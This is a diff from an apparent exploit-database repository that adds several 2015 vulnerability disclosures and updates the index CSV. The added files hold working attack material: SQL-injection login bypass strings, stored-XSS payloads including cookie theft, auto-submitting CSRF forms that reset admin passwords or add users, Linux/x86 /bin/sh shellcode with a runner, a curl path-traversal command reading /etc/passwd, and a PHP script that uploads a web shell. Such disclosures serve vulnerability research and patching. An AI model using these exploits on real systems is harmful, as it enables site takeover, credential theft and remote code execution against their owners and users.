DB: 2015-06-13

7 new exploits

files.csv

@@ -33612,7 +33612,8 @@ id,file,description,date,author,platform,type,port
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
-37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
+37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
+37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
@@ -33621,6 +33622,7 @@ id,file,description,date,author,platform,type,port
 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 -  Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
+37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
 37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
@@ -33633,3 +33635,8 @@ id,file,description,date,author,platform,type,port
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
+37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
+37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
+37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
+37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
+37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80

platforms/jsp/webapps/37272.txt

@@ -0,0 +1,137 @@
+# Exploit Title:  SQL Injection & Persistent XSS
+# Google Dork: intitle: SQL Injection & Persistent XSS
+# Date: 2015-06-12
+# Exploit Author:  John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: zencherry.com
+# Software Link: sourceforge.net/projects/zencherrycms
+# Version: 1.1
+# Tested on: windows 7 on Apache Tomcat
+# Category: webapps
+
+
+Vendor:
+=============================================
+http://zencherry.com/
+http://sourceforge.net/projects/zencherrycms
+
+
+
+Product:
+==================================================
+ZCMS 1.1 JavaServer Pages Content Management System
+
+
+
+Advisory Information:
+==============================
+SQL Injection & Persistent XSS
+
+
+
+Vulnerability Details:
+======================
+SQL Injection:
+Login to admin area requires a password but is easily bypassed
+using classic SQLInjection method because application uses
+concatenated user input to construct SQL queries.
+
+
+ZCMS exploitable admin login code:
+==================================
+squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users
+WHERE
+status = 0 AND username = '"+username+"' AND password =
+'"+request.getParameter("pass") +"' AND type = 1 ;";
+
+
+So we just supply an Admin password like --->  HELL' OR '2'='2
+which will resolve as true!
+
+
+SQL Inject XSS Payload:
+=======================
+We can also inject persisten XSS payload directly to MySQL database
+subverting
+all character filtering leveraging existing SQLInjection vulnerabilities.
+
+
+Persistent XSS:
+===============
+
+Another persistent XSS vector is here in author field for comments:
+http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
+number]
+
+
+Exploit code(s):
+===============
+
+1) Bypass admin login
+---------------------
+localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
+Enter 'admin' for username field
+Enter HELL' OR '2'='2 for the pass field
+
+
+2) Inject XSS using SQL Injection
+---------------------------------
+http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=
+"<script>alert(1)</script>
+&content=<script>alert(1)</script>&author=<script>alert(1)</script>
+SATAN&visibility=1&type=1&comm=0
+
+
+3) Persistent XSS field
+-----------------------
+http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
+number]
+Inject <script>alert(666)</script> in author input field.
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: NA
+June 12, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+Request Method(s):         [+] GET & POST
+
+
+Vulnerable Product:        [+] ZCMS_1.1
+
+
+Vulnerable Parameter(s):   [+] pass, title, content, author
+
+
+Affected Area(s):          [+] Admin, CMS
+
+
+===============================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that
+it is not altered except by reformatting it, and that due credit is given.
+Permission is
+explicitly given for insertion in vulnerability databases and similar,
+provided that
+due credit is given to the author. The author is not responsible for any
+misuse of the
+information contained herein and prohibits any malicious use of all
+security related
+information or exploits by the author or elsewhere.
+
+
+(hyp3rlinx)

platforms/lin_x86/shellcode/37251.asm

@@ -0,0 +1,29 @@
+Linux/x86 execve /bin/sh shellcode 21 bytes
+
+
+#Greetz : KnocKout,curtis,Bomberman(Leader)
+#Author : B3mB4m
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060: 31 c0                 xor    %eax,%eax
+ 8048062: 50                    push   %eax
+ 8048063: 68 2f 2f 73 68        push   $0x68732f2f
+ 8048068: 68 2f 62 69 6e        push   $0x6e69622f
+ 804806d: 89 e3                 mov    %esp,%ebx
+ 804806f: 89 c2                 mov    %eax,%edx
+ 8048071: b0 0b                 mov    $0xb,%al
+ 8048073: cd 80                 int    $0x80
+
+
+#include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80";
+
+int main(void){
+  fprintf(stdout,"Length: %d\n",strlen(shellcode));
+  (*(void(*)()) shellcode)();}
+  
+# Length: 21 PWNED !

platforms/linux/local/120.c

@@ -59,7 +59,7 @@
 #define PATH "/usr/local/bin/terminatorX"
 #define RET 0xbffff69e
 
-char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
+char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
       "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
 
 char *buffer,*ptr;
@@ -234,6 +234,6 @@ main(int argc,char *argv[])
 
       return 0;
 }
-
+
-
+
-// milw0rm.com [2003-11-13]
+// milw0rm.com [2003-11-13]

platforms/multiple/webapps/37271.txt

@@ -0,0 +1,68 @@
+# Exploit title: Opsview 4.6.2 - Multiple XSS
+# Date: 07-06-2015
+# Vendor homepage: www.opsview.com
+# Version: 4.6.2
+# CVE: CVE-2015-4420
+# Author: Dolev Farhi @dolevf
+# Tested On: Kali Linux + Windows 7
+
+# Details:
+# --------
+# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version
+
+
+
+1. Stored XSS through a malicious check plugin
+
+a. Create a plugin with the following content:
+
+#!/bin/bash
+echo '<script>alert("script0t0s")</script>'
+exit 2
+
+b. create a new check and assign this plugin.
+
+c. once a host uses this check, navigate to the event page, the XSS will be injected.
+
+d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.
+
+
+
+2. Stored XSS in host profile
+
+a. add a host
+
+b. in the description of the host, add a description as the one below:
+<script>alert(document.cookie)</script>
+
+c. save settings
+
+d. once a user/admin views the host settings, XSS will be injected.
+
+
+3. Reflected XSS in Test service check page.
+a. Add a new service check
+
+b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>
+
+c. the XSS will immediately reflect to the screen.
+
+response output:
+
+POST /state/service/166/exec HTTP/1.1
+Host: 192.168.0.20
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
+Accept: text/plain, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
+Content-Length: 105
+Cookie: PHPSESSID=
+auth_tkt=
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915

platforms/php/webapps/37248.txt

@@ -103,13 +103,3 @@ ___________    ____   ____ _____  |  | __ ___________
 |   __(____  /___|  /\___  >____  /__|_ \\___  >__|
 |__|       \/     \/     \/     \/     \/    \/
 .........................cant be pr0 without ascii art 
-
-
-     Den tisdag, 9 juni 2015 8:17 skrev john smith <pancaker_1338@yahoo.se>:
-   
-
- sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137
-
-
-
-  

platforms/php/webapps/37266.txt

@@ -0,0 +1,51 @@
+# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF
+# Google Dork: allinurl:/clickheat/
+# Date: 11-06-2015
+# Exploit Author: David Shanahan (@CyberpunkSec)
+# Contact: https://twitter.com/CyberpunkSec
+# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html
+# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/
+# Version: 1.14
+# Tested on: Windows
+
+---- Description ----
+
+ClickHeat is vulnerable to a CSRF attack because it does not implement a
+CSRF token when updating the config file.  If an authenticated admin is
+tricked into opening this malicious URL, the form will be submitted which
+changes the administrator password to the one the attacker has specified.
+
+---- CSRF PoC ----
+
+Set the value of "adminLogin" to the administrators username, then set the
+value of "adminPass" to a md5 hash of the password you want. (you may also
+need to change the "logPath" & "cachePath")
+
+/* CODE */
+
+<body onload="document.forms[0].submit()">
+
+<form action="http://127.0.0.1/clickheat/index.php?action=config"
+method="post" class="center">
+<input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp
+/htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat
+/cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:"
+adminLogin";s:5:"admin";s:9:"adminPass";s:32:"
+5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass
+";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:"
+heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes
+";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes
+";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__
+browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet
+Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}"
+/>
+<input type="hidden" name="save" value="true" /><input type="submit"
+value="Save configuration" /></form>
+
+/* CODE */
+
+---- Solution ----
+
+The ClickHeat project seems to be dead, as it has not been updated since
+late 2011.  Due to this, I truly doubt a patch will be issued so I would
+recommend removing this product from your website.

platforms/php/webapps/37270.txt

@@ -0,0 +1,284 @@
+# Exploit Title:  CSRF, Persistent XSS & LFI
+# Google Dork: intitle: CSRF, Persistent XSS & LFI
+# Date: 2015-06-11
+# Exploit Author:  John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: kilrizzy.github.io/Nakid-CMS
+# Software Link: kilrizzy.github.io/Nakid-CMS
+# Version: kilrizzy-Nakid-CMS-f274624
+# Tested on: windows 7 on XAMPP
+# Category: webapps
+
+
+Vendor:
+================================
+http://kilrizzy.github.io/Nakid-CMS/
+
+
+
+Product:
+================================
+kilrizzy-Nakid-CMS-f274624
+Nakid CMS is an open source content management system built using PHP and
+CodeIgniter.
+
+
+Setup mode:
+==========
+Under root dir for Nakid CMS we set to production mode instead of
+development in index.php.
+e.g. define('ENVIRONMENT', 'production');
+
+
+
+Advisory Information:
+================================================
+CSRF, Persistent XSS &  Auth bypass LFI
+
+
+
+Vulnerability Details:
+=====================
+Multiple CSRF(s) exist:
+
+We have ability to do the following as no CSRF tokens are present.
+
+1-Change Admin password
+2-Add arbitrary users to system
+3-Alter system settings
+
+
+
+XSS (persistent):
+XSS parameter vulnerabilities exist for the following:
+payloads will be stored in the MySQL database and activated when a victim
+visits the vulnerable webpage.
+
+
+XSS URL:
+--------
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
+On the "Edit Record" pop up dialog box.
+
+
+Vulnerable parameters:
+---------------------
+username
+password
+email
+fname
+lname
+
+
+XSS URL:
+--------
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
+On the "Edit Record" pop up dialog box.
+
+
+Vulnerable parameters:
+---------------------
+from_name
+include_path
+primary_email
+from_email
+
+
+XSS URL:
+--------
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1
+
+Vulnerable parameter:
+--------------------
+title
+
+
+Authentication bypass LFI:
+Local file inclusion to bypass access controls and read aribitrary files
+exist by setting '$url' PHP variable on following URL
+
+index.php/connector$url
+
+
+
+Exploit POC code(s):
+====================
+
+CSRF(s):
+========
+
+Condition:
+Pursuade victim to visit our webpage or click our link, if they have a
+session then we do our CSRF!.
+
+
+1- Add arbitrary user to system
+--------------------------------
+
+<!DOCTYPE>
+<html>
+<head>
+<script>
+function doit(){
+var e=document.getElementById('ruinurlife')
+e.submit()
+}
+</script>
+</head>
+<body onLoad="doit()">
+<form id="ruinurlife" action="
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"
+method="post">
+<input type="text" name="username" value="sum1" />
+<input type="text" name="password" value="abc123" />
+<input type="text" name="email" value="X@X.com"/>
+<input type="text" name="fname" value="sum"/>
+<input type="text" name="lname" value="1"/>
+<input type="text" name="oper" value="add"/>
+<input type="text" name="id" value="_empty"/>
+</form>
+</body>
+</html>
+
+
+2-Change Admin password
+------------------------
+
+<!DOCTYPE>
+<html>
+<head>
+<script>
+function doit(){
+var e=document.getElementById('ruinurlife')
+e.submit()
+}
+</script>
+</head>
+<body onLoad="doit()">
+<form id="ruinurlife" action="
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"
+method="post">
+<input type="text" name="username" value="admin" />
+<input type="text" name="password" value="xyz123" />
+<input type="text" name="email" value="hell@abyss.com"/>
+<input type="text" name="fname" value="hyp3r"/>
+<input type="text" name="lname" value="linx"/>
+<input type="text" name="action" value="edit_profile"/>
+<input type="text" name="submitbt" value="Save"/>
+</form>
+</body>
+</html>
+
+
+3-Alter system settings
+-----------------------
+
+<!DOCTYPE>
+<html>
+<head>
+<script>
+function doit(){
+var e=document.getElementById('ruinurlife')
+e.submit()
+}
+</script>
+</head>
+<body onLoad="doit()">
+<form id="ruinurlife" action="
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"
+method="post">
+<input type="text" name="value" value="HELL@ABYSS.com" />
+<input type="text" name="oper" value="edit" />
+<input type="text" name="id" value="1"/>
+</form>
+</body>
+</html>
+
+
+XSS persistent POC code:
+=======================
+
+Inject <script>alert(666)</script> into any of the following vulnerable
+fields described above using POST method.
+Need to highlight a row then click edit dialog box to edit settings.
+
+e.g.
+
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
+
+from_name     <------- <script>alert(666)</script>
+include_path
+primary_email
+from_email
+
+
+Authorization bypass LFI:
+========================
+
+1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web
+root, then visit the URL (change to suit your environment).
+
+2-
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt
+
+OR try
+
+http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php
+
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: NA
+June 11, 2015 : Public Disclosure
+
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+Request Method(s):         [+] GET & POST
+
+
+Vulnerable Product:        [+] kilrizzy-Nakid-CMS-f274624
+
+
+Vulnerable Parameter(s):   [+]
+                              username
+                              password
+                              email
+                              fname
+                              lname
+                              from_name
+                              include_path
+                              primary_email
+                              from_email
+                              title
+                              connector$url
+
+
+Affected Area(s):          [+] /system/users
+                               /system/profile
+                               /system/content_edit/
+
+===============================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author. The author is not responsible for any misuse of the information
+contained herein and prohibits any malicious use of all security related
+information or exploits by the author or elsewhere.
+
+
+(hyp3rlinx)

platforms/php/webapps/37274.txt

@@ -0,0 +1,53 @@
+Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-06-06
+Advisory: http://www.vapid.dhs.org/advisory.php?v=124
+Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
+Vendor: https://profiles.wordpress.org/sedevelops/
+Vendor Notified: 2015-06-06
+Vendor Contact: https://profiles.wordpress.org/sedevelops/
+Description: 
+An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
+
+Vulnerability:
+The se-html5-album-audio-player v1.1.0  plugin for wordpress has a remote file download vulnerability.  The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
+
+This vulnerability doesn’t require authentication to the Wordpress site.
+
+File ./se-html5-album-audio-player/download_audio.php:
+
+3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
+4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
+5 // make sure it's a file before doing anything!
+6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
+7 
+8         // required for IE
+9         if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off');         }
+10     
+11         // get the file mime type using the file extension
+12         switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
+13                 case 'pdf': $mime = 'application/pdf'; break;
+14                 case 'zip': $mime = 'application/zip'; break;
+15                 case 'jpeg':
+16                 case 'jpg': $mime = 'image/jpg'; break;
+17                 default: $mime = 'application/force-download';
+18         }
+19         header('Pragma: public');       // required
+20         header('Expires: 0');           // no cache
+21         header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+22         header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
+23         header('Cache-Control: private',false);
+24         header('Content-Type: '.$mime);
+25         header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
+26         header('Content-Transfer-Encoding: binary');        
+27         header('Content-Length: '.filesize($file_name));        // provide file size
+28         header('Connection: close');
+29         readfile($file_name);           // push it out
+30         exit();
+
+The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
+
+CVEID: 2015-4414
+OSVDB:
+Exploit Code:
+  • $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd

platforms/php/webapps/37275.txt

@@ -0,0 +1,87 @@
+Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-06-07
+Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
+Vendor: Waters Edge Web Design and NetherWorks LLC
+Vendor Notified: 2015-06-08
+Advisory: http://www.vapid.dhs.org/advisory.php?v=125
+Vendor Contact: plugins@wordpress.org
+Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
+Vulnerability:
+There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
+
+In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:
+
+1 <?php
+2 
+3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
+4 if (file_exists($filename)) {
+5     include_once($filename);
+6 } else {
+7     include_once("../../../../wp-load.php");
+8 }
+9 echo "Here";
+10 $image_file = $_FILES['gf_aviary_file'];
+11 if($image_file['name']!=''){
+12      $max_file_size =  4*1024*1024;
+13      $file_size = intval($image_file['size']);
+14      if( $file_size > $max_file_size ){
+15          $msg = "File Size is too big.";
+16          $error_flag = true;
+17      }
+18      $extension = strtolower(end(explode('.', $image_file['name'])));
+19      $aa_options = get_option('gf_aa_options');
+20      $supported_files = $aa_options['supported_file_format'];
+21      $supported_files = strtolower($supported_files);
+22      if(!$error_flag && $supported_files != '' ){
+23        $supported_files = explode (',', $supported_files);
+24        if(!in_array($extension, $supported_files)){
+25           $msg = "No Supported file.";
+26           $error_flag = true;
+27        }
+28      }
+29      if(!$error_flag){
+30         $wp_upload_dir = wp_upload_dir();
+31         if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
+32              mkdir($wp_upload_dir['basedir'].'/gform_aviary');
+33         }
+34         $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
+35         $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
+36         $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'    ];
+37         if(move_uploaded_file($image_file['tmp_name'], $file_name)){
+38             $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na    me'];
+39         }
+40     }
+41     $return_obj = array('status' => 'success', 'message' => $file_url);
+42     echo json_encode($return_obj);
+43  }
+44 ?>
+
+CVEID: 2015-4455
+OSVDB:
+Exploit Code:
+<?php
+/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
+/*Larry W. Cashdollar @_larry0
+6/7/2015
+shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
+*/
+
+
+    $target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
+    $file_name_with_full_path = '/var/www/shell.php';
+
+    echo "POST to $target_url $file_name_with_full_path";
+    $post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
+
+    $ch = curl_init();
+    curl_setopt($ch, CURLOPT_URL,$target_url);
+    curl_setopt($ch, CURLOPT_POST,1);
+    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
+    $result=curl_exec ($ch);
+    curl_close ($ch);
+    echo "<hr>";
+    echo $result;
+    echo "<hr>";
+?>